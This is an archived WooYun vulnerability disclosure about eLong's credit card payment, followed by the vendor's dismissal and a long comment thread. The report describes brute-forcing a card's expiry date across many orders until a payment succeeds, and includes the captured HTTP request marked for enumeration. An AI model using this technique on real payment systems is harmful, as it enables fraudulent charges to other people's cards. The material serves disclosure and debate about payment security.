艺龙旅行网严重支付漏洞（只需知道银行信用卡号即可消费）

首先，在艺龙随便下了一个订单，到支付页面，选择信用卡支付

输入正确的卡号，有效期

姓名，身份证等相关信息随便输

居然支付成功了。

那么问题来了

说明这里只判断信用卡有效期即可成功支付

接下来就简单了，我们只要尝试爆破出信用卡的有效期即可

然后发现错误的有效期也能使订单到判定支付是否成功的阶段

所以。下多个订单

随便点击一个订单到支付页面

抓包

POST /epay/isajax/CreditCardExtend/Save HTTP/1.1
 x-requested-with: XMLHttpRequest
 Accept-Language: zh-cn
 Referer: https://secure.elong.com/epay/cn/creditcardextend/433877263696341615train
 Accept: application/json, text/javascript, */*
 Content-Type: application/x-www-form-urlencoded
 Accept-Encoding: gzip, deflate
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
 Host: secure.elong.com
 Content-Length: 360
 Connection: Keep-Alive
 Cache-Control: no-cache
 Cookie: SessionGuid=42ff44d5-95e9-4a84-a57b-0199c4a28a59; com.eLong.CommonService.OrderFromCookieInfo=Pkid=50&Parentid=50000&Coefficient=0.0&Status=1&Priority=8000&Makecomefrom=0&Savecookies=0&Cookiesdays=0&Isusefparam=0&Orderfromtype=1; s_cc=true; s_sq=elongcom%3D%2526pid%253Dmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fmy.elong.com%25252Ftrain%25252Ftrainorder_cn.html%25253Frnd%25253D20160323142748598%252523%25253F%2526ot%253DA%2526oi%253D413; CookieGuid=bf5e468c-2c0e-4e32-a174-c6b00a59600b; Esid=72832668-11ae-4cf6-8486-f2a53dda7c15; member=********; Lgid=LRpRtrsC3gsExwGXhEk%2flpaR3waA7McUH7SGryL5%2fSFdUfZTcxrrKJN7gDYF38TJf%2b6813mw0I7%2bEqLpl1r2dNM00g3TNSUIsbfjUZc3xAoySWAQkZq3Hr3%2fuLPImoK3; s_visit=1; route=d99f2606f97cd9d480bdb1efdeca5346; ASP.NET_SessionId=go0f0j550ckcs055bbbdmvu1; TLTCNT=CHG-OWEBTJ10000000000077396
 
 language=cn&id=§433877263696341615train§&paymentInfo.CreditCardNumber=******&paymentInfo.Cardholder=%E6%B5%8B%E8%AF%95&paymentInfo.FirstName=&paymentInfo.MiddleName=&paymentInfo.LastName=&paymentInfo.CardValidity=§2022-1§&paymentInfo.CertificateTypeID=2&paymentInfo.CertificateNumber=321321&paymentInfo.CheckedLast4Num=false&paymentInfo.IdOfCardsHistory=

订单+有效期爆破。隔几秒放过

那么订单都会到判断支付是否成功的阶段，如果订单支付成功，说明有效期是正确的

成功爆破出信用卡有效期并成功支付

信用卡支付逻辑是不是该有有效期+CVV码+手机验证码组成？

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-03-24 02:22

厂商回复：

亲爱的乌云同行及白帽子，您们好：

经过我们与贵方的多次沟通和解释，此问题为有误解的错误漏洞报告。在艺龙平台上的信用卡支付过程中，不同的银行确实会要求提交不同的用户信用卡信息。有的银行自己设定只需要信用卡号和有效期就可以完成支付，而不需要其他例如验证CVV码的流程，但是后续控制措施会从用户看不到的其他方面加以弥补。有时需要额外收集身份证信息是用于和部分银行信用卡中心核对持卡人身份，是属于一个保证支付安全的内部控制加强措施。

众所周知，使用假信用卡或盗用他人的信用卡信息进行支付是非常严重的违法行为，作为已经在本行业经营十多年的成熟企业，艺龙提醒广大用户妥善保管好自己的信用卡信息。艺龙已经通过了PCI DSS认证（Payment Card Industry Data Security Standard，由国际顶级信用卡公司Visa，MasterCard，JCB等联合出台的全球信用卡信息安全标准），将与银行和同业公司一起努力为广大用户提供更安全，更方便和更快捷的支付体验。

作为艺龙公司，我们非常重视用户的所有安全问题，如有咨询请随时与艺龙公司联系，感谢您的大力支持！

漏洞Rank：15 (WooYun评价)

最新状态：

暂无

1. 2016-03-23 15:33 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   1

   尼玛呀

   1# 回复此人

2. 2016-03-23 15:34 | j0k3r ( 普通白帽子 | Rank:783 漏洞数:200 | 心有猛虎，细嗅蔷薇)

   1

   可怕

   2# 回复此人

3. 2016-03-23 15:34 | 我是壮丁 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

   1

   可啪

   3# 回复此人

4. 2016-03-23 15:35 | AK-47 ( 实习白帽子 | Rank:78 漏洞数:11 | 开开心心挖洞，踏踏实实上学！)

   1

   这么牛叉，要火

   4# 回复此人

5. 2016-03-23 15:35 | zmx ( 普通白帽子 | Rank:164 漏洞数:43 | wooyun)

   1

   嘀，上墙卡

   5# 回复此人

6. 2016-03-23 15:35 | 小胖子 ( 核心白帽子 | Rank:1888 漏洞数:156 | 不要患得患失，我羡慕你，但是我还是选择做...)

   1

   好可怕

   6# 回复此人

7. 2016-03-23 15:35 | Aasron ( 普通白帽子 | Rank:905 漏洞数:163 | raw_input("你知道我要输入什么？"))

   1

   首先你得先有一张信用卡

   7# 回复此人

8. 2016-03-23 15:35 | Focusstart ( 普通白帽子 | Rank:830 漏洞数:206 | 努力让某某某成为最幸福的女人！)

   1

   吓得我以后都不敢用信用卡了

   8# 回复此人

9. 2016-03-23 15:35 | 带馅儿馒头 ( 核心白帽子 | Rank:1399 漏洞数:157 | 心在，梦在)

   1

   还好我不用

   9# 回复此人

10. 2016-03-23 15:36 | 狗狗侠 ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)

    1

    打雷了，该出来收衣服了

    10# 回复此人

11. 2016-03-23 15:36 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

    1

    好可怕，还好我没信用卡，

    11# 回复此人

12. 2016-03-23 15:36 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ，菜渣， 菜呀！)

    1

    可啪啪啪！

    12# 回复此人

13. 2016-03-23 15:37 | 瘦蛟舞 ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    1

    屌

    13# 回复此人

14. 2016-03-23 15:37 | just_joker ( 普通白帽子 | Rank:124 漏洞数:22 | ..........)

    1

    随随便便，开了一间免费的大床炮房

    14# 回复此人

15. 2016-03-23 15:37 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

    1

    66666

    15# 回复此人

16. 2016-03-23 15:42 | 咕噜流氓兔 ( 路人 | Rank:0 漏洞数:1 | 专业段子手~~~！)

    1

    66666，开房免费了 这下

    16# 回复此人

17. 2016-03-23 15:43 | Mieless ( 实习白帽子 | Rank:35 漏洞数:10 | 我是来打酱油的。)

    1

    滴，卡号110120119，学生卡，麻烦皇家礼炮开个房

    17# 回复此人

18. 2016-03-23 15:48 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

    1

    我草！

    18# 回复此人

19. 2016-03-23 15:49 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向，哪怕前路迷茫；抱着最大的...)

    1

    这个问题有点严重啊

    19# 回复此人

20. 2016-03-23 15:50 | 木头 ( 路人 | Rank:28 漏洞数:5 | 一二三，木头人)

    1

    火钳占座

    20# 回复此人

21. 2016-03-23 16:05 | JutaZ ( 实习白帽子 | Rank:95 漏洞数:14 | 少壮不努力老大徒伤悲)

    1

    可怕

    21# 回复此人

22. 2016-03-23 16:06 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

    1

    我最近想去个北欧地极10日游，不知道sky大金表的卡能不能扛得住

    22# 回复此人

23. 2016-03-23 16:08 | also ( 普通白帽子 | Rank:434 漏洞数:53 | 招渗透/php/前端/ios&android安全，广州)

    2

    是否跟上次携程那个一样？

    23# 回复此人

24. 2016-03-23 16:10 | 皮卡丘♪～(´ε｀　) ( 路人 | Rank:2 漏洞数:1 | 我是小号啊)

    3

    总统套房，先开100年，谢谢

    24# 回复此人

25. 2016-03-23 16:12 | Whysec ( 实习白帽子 | Rank:62 漏洞数:15 )

    3

    还好我办不起信用卡

    25# 回复此人

26. 2016-03-23 16:15 | hh2014 ( 普通白帽子 | Rank:1106 漏洞数:255 | )

    2

    666

    26# 回复此人

27. 2016-03-23 16:16 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

    1

    幸好我不用信用卡

    27# 回复此人

28. 2016-03-23 16:18 | Format_smile ( 普通白帽子 | Rank:640 漏洞数:216 | ···孰能无过，谁是谁非！)

    2

    简直阔怕啊

    28# 回复此人

29. 2016-03-23 16:18 | ArcticWolf ( 普通白帽子 | Rank:112 漏洞数:34 | 呃···是AW！不是AV！)

    1

    看到上面清一色核心，，来沾沾挖洞的灵气

    29# 回复此人

30. 2016-03-23 16:19 | zsmj ( 普通白帽子 | Rank:243 漏洞数:34 | 蛛丝马迹！)

    1

    可 啪

    30# 回复此人

31. 2016-03-23 16:21 | 江苏苏宁易购电子商务有限公司(乌云厂商)

    1

    没有信用卡的路过

    31# 回复此人

32. 2016-03-23 16:22 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    1

    这是怎么做到的？？难道银行接口还没限制啊？

    32# 回复此人

33. 2016-03-23 16:23 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    密码在数据库中了吧？

    33# 回复此人

34. 2016-03-23 16:30 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高，标题一定得屌)

    1

    @江苏苏宁易购电子商务有限公司 苏宁，发我几张神秘代码卡，如何？

    34# 回复此人

35. 2016-03-23 16:34 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)

    1

    要火

    35# 回复此人

36. 2016-03-23 16:36 | 小胖子 ( 核心白帽子 | Rank:1888 漏洞数:156 | 不要患得患失，我羡慕你，但是我还是选择做...)

    1

    滴，穴深卡~

    36# 回复此人

37. 2016-03-23 16:38 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

    1

    前排占座，哈哈哈。

    37# 回复此人

38. 2016-03-23 16:39 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁？)

    1

    卧槽！前排围观！

    38# 回复此人

39. 2016-03-23 16:40 | loli ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

    2

    请警察叔叔密切关注此人去向。

    39# 回复此人

40. 2016-03-23 16:41 | xiaoxiaoleo ( 实习白帽子 | Rank:51 漏洞数:15 | xx.oo)

    1

    http://tech.qq.com/a/20140327/005032.htm

    40# 回复此人

41. 2016-03-23 16:48 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    啊！啊！~

    41# 回复此人

42. 2016-03-23 16:50 | 白非白 ( 普通白帽子 | Rank:559 漏洞数:85 | ♫ Freedom - Anthony Hamilton ♫)

    1

    滴，涝粘卡~

    42# 回复此人

43. 2016-03-23 16:55 | secart ( 实习白帽子 | Rank:50 漏洞数:9 | 这个人很懒，什么都没留。)

    1

    我带着你,你带着信用卡,我们一起去旅行吧~~~~

    43# 回复此人

44. 2016-03-23 16:56 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    1

    事实证明了一些问题现象！老百姓路过～咱是无辜的！$$$不见了！哦

    44# 回复此人

45. 2016-03-23 16:58 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

    1

    多个银行都行，好变态的构造

    45# 回复此人

46. 2016-03-23 17:23 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

    1

    $$$不见了！哦

    46# 回复此人

47. 2016-03-23 17:36 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命！)

    1

    .

    47# 回复此人

48. 2016-03-23 17:37 | 百度谷歌bing狗一下 ( 路人 | Rank:21 漏洞数:4 | 学到老活到老!)

    1

    为什么没人发CCAV看这里了...

    48# 回复此人

49. 2016-03-23 17:38 | 闰土。 ( 路人 | Rank:6 漏洞数:3 | 做自己的英雄 - rainto .)

    1

    害怕~ ，高清重置。

    49# 回复此人

50. 2016-03-23 17:51 | 小豹 ( 实习白帽子 | Rank:57 漏洞数:10 | 没有不老的誓言，没有不变的承诺，踏上旅途...)

    1

    吓得我，把钱取完了

    50# 回复此人

51. 2016-03-23 17:58 | ANS5 ( 普通白帽子 | Rank:349 漏洞数:107 | 此心安处是吾乡)

    1

    卧槽，要火！

    51# 回复此人

52. 2016-03-23 18:23 | 苏安泽 ( 普通白帽子 | Rank:194 漏洞数:55 | 一个想成为演员的黑客~)

    1

    我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！

    52# 回复此人

53. 2016-03-23 18:29 | Can ( 普通白帽子 | Rank:116 漏洞数:36 | 安全培训联系QQ23319509)

    1

    叼叼叼

    53# 回复此人

54. 2016-03-23 18:38 | by黑桃 ( 实习白帽子 | Rank:95 漏洞数:37 | 昨晚和老公大吵了一架，今天早上来大夷妈了...)

    1

    把这些人全部给我带走

    54# 回复此人

55. 2016-03-23 18:53 | 我是你的益达！ ( 实习白帽子 | Rank:34 漏洞数:7 | 容我喝壹杯捌贰年的雪碧压压精！！)

    1

    ........

    55# 回复此人

56. 2016-03-23 19:10 | 表哥 ( 实习白帽子 | Rank:42 漏洞数:11 | 他依然帅气。)

    2

    我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！额，我车呢

    56# 回复此人

57. 2016-03-23 19:18 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    5

    看标题就大概知道了， 信用卡号+信用卡有效期完成支付？ 这个应该是银行本身的问题，做过信用卡支付的都知道。这是银行的问题，跟具体使用公司没有太大关系。你们这些穷屌果断退散。

    57# 回复此人

58. 2016-03-23 19:23 | 黑云 ( 路人 | Rank:12 漏洞数:3 | 米有)

    1

    只是需要知道卡号就可以支付吗？不会这么简单吧？

    58# 回复此人

59. 2016-03-23 19:28 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    1

    怎么多人留言，咱们唯一目地就是提醒各位厂商！一个小细节可能给客户带来财产威胁（责任还是厂商）如果属实！各位厂商引以为戒！（乌云路人甲个人个人观点）

    59# 回复此人

60. 2016-03-23 19:39 | Hackshy ( 实习白帽子 | Rank:88 漏洞数:30 | XXXXXXXXXXXX)

    1

    ..!!!!!!!!!!!!... 说得好像你们能看得到似的。

    60# 回复此人

61. 2016-03-23 19:42 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    1

    !!!!!打雷了！又是敏感标题！咱们看不到！但是可以想象！哈

    61# 回复此人

62. 2016-03-23 19:43 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

    1

    吓得我马上把银行卡剪烂丢进厕所冲走了

    62# 回复此人

63. 2016-03-23 19:44 | loopx9 ( 普通白帽子 | Rank:827 漏洞数:84 | ..)

    1

    啪啪啪！

    63# 回复此人

64. 2016-03-23 19:53 | 诚殷的小白帽 ( 实习白帽子 | Rank:76 漏洞数:36 )

    1

    papapap

    64# 回复此人

65. 2016-03-23 20:02 | AAA ( 路人 | Rank:0 漏洞数:2 | 战五渣~)

    1

    这应该是CNP吧！这应该是CNP吧！这应该是CNP吧！携程早就在用了，去年还有人报过。

    65# 回复此人

66. 2016-03-23 20:04 | webhe4d ( 普通白帽子 | Rank:143 漏洞数:48 )

    1

    可以可以。

    66# 回复此人

67. 2016-03-23 20:19 | AAA ( 路人 | Rank:0 漏洞数:2 | 战五渣~)

    1

    @江苏苏宁易购电子商务有限公司

    67# 回复此人

68. 2016-03-23 21:05 | 泪雨无魂 ( 普通白帽子 | Rank:318 漏洞数:72 | too young too simple)

    1

    好可怕

    68# 回复此人

69. 2016-03-23 21:35 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)

    1

    @江苏苏宁易购电子商务有限公司 同路过

    69# 回复此人

70. 2016-03-23 21:45 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    1

    @江苏苏宁易购电子商务有限公司 喜闻乐见

    70# 回复此人

71. 2016-03-23 21:59 | 盛大在线(乌云厂商)

    1

    人艰不拆

    71# 回复此人

72. 2016-03-23 22:01 | s3xy ( 普通白帽子 | Rank:994 漏洞数:131 | 相濡以沫，不如相忘于江湖)

    1

    马克

    72# 回复此人

73. 2016-03-23 22:18 | Cheery ( 路人 | Rank:26 漏洞数:5 | 0.0)

    1

    老司机 带带我！！！

    73# 回复此人

74. 2016-03-23 22:26 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    1

    可以黑产！

    74# 回复此人

75. 2016-03-23 22:39 | ucifer ( 普通白帽子 | Rank:231 漏洞数:74 | 萌萌哒~)

    1

    卧槽，吓得我都把艺龙给注销账号了

    75# 回复此人

76. 2016-03-24 00:44 | 泛海扬帆 ( 实习白帽子 | Rank:99 漏洞数:27 | 广告位招商 Tel:136xxxxxxxx)

    1

    袍哥威武

    76# 回复此人

77. 2016-03-24 04:53 | zzR ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红＊＊联盟欢迎你－0-)

    3

    艺龙的意思：银行很叼，我也很叼，这事我也没办法！嗯

    77# 回复此人

78. 2016-03-24 04:56 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    1

    艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

    78# 回复此人

79. 2016-03-24 06:22 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    1

    忽略了....._第一次见厂家这么长的回复！

    79# 回复此人

80. 2016-03-24 08:24 | hecate ( 普通白帽子 | Rank:823 漏洞数:128 | ®高级安全工程师 | WooYun认证√)

    1

    艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

    80# 回复此人

81. 2016-03-24 08:49 | 暴走 ( 普通白帽子 | Rank:615 漏洞数:107 | 专心补刀。)

    3

    厂商的这句话"但是后续控制措施会从用户看不到的其他方面加以弥补"什么意思啊，尼玛人家都已经可以下单支付成功了，你在后续控制毛啊，你后续控制能把他人刷走消费者信用卡的钱给用户补回来？

    81# 回复此人

82. 2016-03-24 08:54 | 包包不是包 ( 路人 | Rank:9 漏洞数:5 | 逛了集市,有目标了,刷个iPhone7s Plus 出来)

    1

    最起码的多次输入加验证码的功能要有啊...哎

    82# 回复此人

83. 2016-03-24 08:58 | 吉吉国王 ( 路人 | Rank:2 漏洞数:1 | update)

    2

    涉及真金白银的的反而不容易被利用，刷个会员刷点积分，是一回事，盗刷别人信用卡是另一回事。而且火车都尼玛实名了……散了

    83# 回复此人

84. 2016-03-24 08:59 | 骑虎打狗 ( 路人 | Rank:19 漏洞数:9 | 我是中国式的 你懂得..)

    1

    ”只需要信用卡号和有效期就可以完成支付“那信用卡岂不是很不安全？

    84# 回复此人

85. 2016-03-24 09:02 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

    1

    果断的忽略

    85# 回复此人

86. 2016-03-24 09:05 | 吉吉国王 ( 路人 | Rank:2 漏洞数:1 | update)

    1

    我看洞主的包，不小心看到了洞主的手机号180****8330。。。。让乌云给打个纯洁的马赛克吧。真是醉了……

    86# 回复此人

87. 2016-03-24 09:06 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:63 | 新手上路。)

    1

    果断的忽略 。。。成功的案例也不算了。。。

    87# 回复此人

88. 2016-03-24 09:14 | 啊T ( 路人 | Rank:11 漏洞数:3 | AT)

    1

    厂商回复就不能换个态度嘛。有技术手段能规避就别提银行的事啦，早做措施呗。反而非要计较Focusstart对洞理解有偏差，都被点了，还把业务核心交代一番。情商有洞。

    88# 回复此人

89. 2016-03-24 09:30 | 小白喵咪 ( 路人 | Rank:14 漏洞数:4 | IT小刁刁 未成年白客！)

    1

    我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！额，我车呢。。。呀，卡忘了。。

    89# 回复此人

90. 2016-03-24 09:37 | 牛￡金钢 ( 路人 | Rank:20 漏洞数:8 | 我是新手，还需要学习，大神们要指点下了.....)

    1

    这不应该是银行的问题吗？

    90# 回复此人

91. 2016-03-24 09:41 | an0nym0u5 ( 普通白帽子 | Rank:395 漏洞数:69 )

    1

    の 这样也能支付。。

    91# 回复此人

92. 2016-03-24 09:55 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:62 | little red pig!)

    1

    elong，额，没用过

    92# 回复此人

93. 2016-03-24 09:56 | hkAssassin ( 普通白帽子 | Rank:395 漏洞数:73 | 我是一只毛毛虫。)

    1

    艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

    93# 回复此人

94. 2016-03-24 10:00 | Busliv ( 普通白帽子 | Rank:256 漏洞数:27 | to be，and to be)

    1

    猜到是这类型的问题，刚刚开始以为是CVV码的枚举；

    94# 回复此人

95. 2016-03-24 10:01 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

    1

    我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！额，我车呢。。。呀，卡忘了。。

    95# 回复此人

96. 2016-03-24 10:03 | 小红猪 ( 普通白帽子 | Rank:341 漏洞数:62 | little red pig!)

    1

    哈哈哈，楼上

    96# 回复此人

97. 2016-03-24 10:08 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

    1

    艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

    97# 回复此人

98. 2016-03-24 10:15 | cmxz ( 普通白帽子 | Rank:133 漏洞数:15 | )

    1

    如果问题真的是银行给的接口只需要卡号和有效期，那么艺龙能做的只有限制撞有效期的行为

    98# 回复此人

99. 2016-03-24 10:22 | 黑骑士 ( 普通白帽子 | Rank:121 漏洞数:22 | 黑色的骑士守护着光明)

    3

    银行允许只需卡号和有效期支付是银行业务问题，但是能被爆破出有效期就是艺龙的问题，防止用户信息泄露难道不是厂商的分内职责吗？

    99# 回复此人

100. 2016-03-24 10:23 | 隐形人真忙 ( 普通白帽子 | Rank:201 漏洞数:25 | ...)

     1

     但是后续控制措施会从用户看不到的其他方面加以弥补 可是不已经出票成功了么

     100# 回复此人

101. 2016-03-24 10:26 | Me_Fortune ( 普通白帽子 | Rank:361 漏洞数:115 | The quiter you are,the more you're able ...)

     1

     公关要从源头上解决问题，要是被竞争对手大肆报道，毕竟是有损失的 0 0

     101# 回复此人

102. 2016-03-24 10:39 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

     1

     这个还是因为有效期的问题 那么艺龙应该在风险控制上防止爆破

     102# 回复此人

103. 2016-03-24 10:40 | 武器大师 ( 实习白帽子 | Rank:40 漏洞数:13 | 最强的武器是什么？)

     2

     如此关键的一个有效期 艺龙也可以被爆破 居然还忽略问题 找死的节奏

     103# 回复此人

104. 2016-03-24 10:41 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

     1

     看来艺龙不敢背锅呀，哈哈。

     104# 回复此人

105. 2016-03-24 10:44 | Gpwn ( 路人 | Rank:10 漏洞数:6 | 挖煤进阶)

     1

     这个问题不在有效期上，而在爆破上。限制卡号测试次数，如3次锁卡走人工通道

     105# 回复此人

106. 2016-03-24 10:49 | 武器大师 ( 实习白帽子 | Rank:40 漏洞数:13 | 最强的武器是什么？)

     1

     人家艺龙就是不敢确定问题，等等再偷偷的把有效期给限住

     106# 回复此人

107. 2016-03-24 11:00 | 泰迪 ( 路人 | Rank:10 漏洞数:1 | 我想知道这个以后还能改么)

     1

     难道所有的厂子都是这么处理信用卡的问题么

     107# 回复此人

108. 2016-03-24 11:00 | Manning ( 普通白帽子 | Rank:1181 漏洞数:144 | https://github.com/manning23/MSpider)

     1

     也就是说测试的银行卡刚好可以这么使用？如果是这样的话，确实不该背锅

     108# 回复此人

109. 2016-03-24 11:02 | xsser ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)

     1

     @Manning 这里的核心其实是有效期可以爆破

     109# 回复此人

110. 2016-03-24 11:10 | Manning ( 普通白帽子 | Rank:1181 漏洞数:144 | https://github.com/manning23/MSpider)

     1

     @xsser 那这是发信用卡银行的问题吧，别的应用是不是也可以这么用这种信用卡呢？

     110# 回复此人

111. 2016-03-24 11:14 | 武器大师 ( 实习白帽子 | Rank:40 漏洞数:13 | 最强的武器是什么？)

     1

     @Manning 这里的核心其实是有效期可以爆破

     111# 回复此人

112. 2016-03-24 11:22 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

     1

     @Manning 这里的核心其实是有效期可以爆破

     112# 回复此人

113. 2016-03-24 11:24 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

     1

     @Manning 不可以

     113# 回复此人

114. 2016-03-24 11:27 | 吉吉国王 ( 路人 | Rank:2 漏洞数:1 | update)

     1

     @xsser 聊背锅的问题，我查了一下艺龙已经十几年了。这种支付模式存在的隐患，十几年了，难道艺龙负责相关技术的不知道吗？这地方的隐患银行难道不知道吗？那为什么还有银行支持，这种东西不是单纯讨论技术了。就像好多公司都在烧钱、赔钱，这种场景单纯从经济学上去分析合理吗？这个锅叫你你背吗？

     114# 回复此人

115. 2016-03-24 11:28 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

     1

     艺龙这是要疯啊= =

     115# 回复此人

116. 2016-03-24 11:32 | 永不言弃 ( 路人 | Rank:19 漏洞数:8 | 敏锐者)

     1

     艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

     116# 回复此人

117. 2016-03-24 11:38 | 未了 ( 路人 | Rank:2 漏洞数:3 )

     1

     两方都有责任吧？ 招行的问题比较大，某员工记住了客户信用卡号跟有效期，以后就随便消费了？

     117# 回复此人

118. 2016-03-24 11:46 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

     1

     见过不要脸的，没见过这么不要脸的．

     118# 回复此人

119. 2016-03-24 13:02 | 神话般的孩纸 ( 路人 | Rank:25 漏洞数:9 | 少年,放下鼠标！我们一起去拯救世界！)

     1

     艺龙的意思：其实漏洞是存在的，打死我都不承认

     119# 回复此人

120. 2016-03-24 13:04 | 光头强吃翔 ( 路人 | Rank:2 漏洞数:1 | 一个新手，欢迎各位大牛指点！)

     1

     其实看意思还是银行那边的问题

     120# 回复此人

121. 2016-03-24 13:26 | 剑芯 ( 实习白帽子 | Rank:48 漏洞数:15 | xsser)

     1

     没文化，没看到是预授权么？预授权和刷卡成功是两回事

     121# 回复此人

122. 2016-03-24 13:43 | byr5ec ( 路人 | Rank:10 漏洞数:2 | I'm pursuing all teh time 5h37|_!)

     1

     “预授权”交易与普通刷卡消费的风险程度一致.预授权占用信用卡额度，除非用户本人取消本次交易。

     122# 回复此人

123. 2016-03-24 14:24 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

     1

     居然忽略了！

     123# 回复此人

124. 2016-03-24 15:23 | 黑色雨滴 ( 实习白帽子 | Rank:39 漏洞数:10 | 没有主页 新手一个 前来玩玩)

     1

     好可怕，还好我没信用卡

     124# 回复此人

125. 2016-03-24 15:42 | Captain BAI ( 路人 | Rank:8 漏洞数:4 )

     1

     国外信用卡不都是有效期+CVV码吗？

     125# 回复此人

126. 2016-03-24 15:58 | 这只猪 ( 路人 | Rank:24 漏洞数:6 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)

     1

     你不背黑锅，谁背黑锅…………

     126# 回复此人

127. 2016-03-24 18:10 | 三秋 ( 路人 | Rank:16 漏洞数:7 | xxooing)

     1

     “但是后续控制措施会从用户看不到的其他方面加以弥补” 错误次数都没限制，还解释个什么鬼。。。好歹3次锁卡锁账户啊，别人都支付成功了，还不认？

     127# 回复此人

128. 2016-03-24 18:31 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力！)

     1

     @三秋 0.0

     128# 回复此人

129. 2016-03-24 21:54 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

     1

     艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

     129# 回复此人

130. 2016-03-24 22:32 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

     1

     “众所周知，使用假信用卡或盗用他人的信用卡信息进行支付是非常严重的违法行为”，也都知道，非法利用漏洞也是违法行为呗，但是黑产才不管你这些呢。说白了，还是不用信用卡的好~

     130# 回复此人

131. 2016-03-25 10:04 | 武器大师 ( 实习白帽子 | Rank:40 漏洞数:13 | 最强的武器是什么？)

     1

     艺龙的意思：银行很叼，我也很叼，这事我也没 办法！嗯

     131# 回复此人

132. 2016-03-25 10:06 | 从容 ( 普通白帽子 | Rank:415 漏洞数:99 | 哇啦啦啦啦啦 我的宝贝 | ..)

     1

     这就有点尴尬了

     132# 回复此人

133. 2016-03-25 10:41 | who_jeff ( 路人 | Rank:16 漏洞数:6 | )

     1

     还好我没信用卡 23333

     133# 回复此人

134. 2016-03-25 11:00 | bigx ( 普通白帽子 | Rank:185 漏洞数:45 | cisp cissp cisa ncie 乌云...)

     1

     关注

     134# 回复此人

135. 2016-03-25 12:17 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚，关注互联网安全)

     1

     NB!

     135# 回复此人

